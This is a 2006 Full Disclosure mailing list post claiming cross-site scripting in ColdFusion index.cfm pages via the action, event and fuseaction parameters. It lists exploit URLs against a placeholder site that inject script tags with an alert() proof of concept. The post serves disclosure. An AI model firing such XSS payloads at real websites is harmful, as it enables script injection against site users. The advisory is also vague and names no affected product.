Full Disclosure mailing list archives
New Ploblem in Index.cfm
From: saied hackeriran <saiedhackeriran () yahoo com>
Date: Wed, 19 Jul 2006 06:12:49 -0700 (PDT)
In The Name Of God Discoverer:SaiedHacker Group:HackeranShiraz Critical Level : Dangerous This matter happens in index.cfm when We want to run some specific Functions Such as action,event,.... and hacker Can start attacks such as XSS attack by Using simple script or HtML code. Exploit: Http://www.Site.com/path/index.cfm?action=<script> Http://www.Site.com/path/index.cfm?event=<script> Http://www.Site.com/path/index.cfm?fuseaction=<script> Xss: Http://www.Site.com/path/index.cfm?action=<script>alert("SaiedHacker");</script> Http://www.Site.com/path/index.cfm?event=<script>alert("SaiedHacker");</script> Http://www.Site.com/path/index.cfm?fuseaction=<script>alert("SaiedHacker");</script> Have fun SaiedHackerIran () yahoo com www.SaiedHackerPro.PersianBlog.com __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- New Ploblem in Index.cfm saied hackeriran (Jul 19)
- Re: New Ploblem in Index.cfm Valdis . Kletnieks (Jul 19)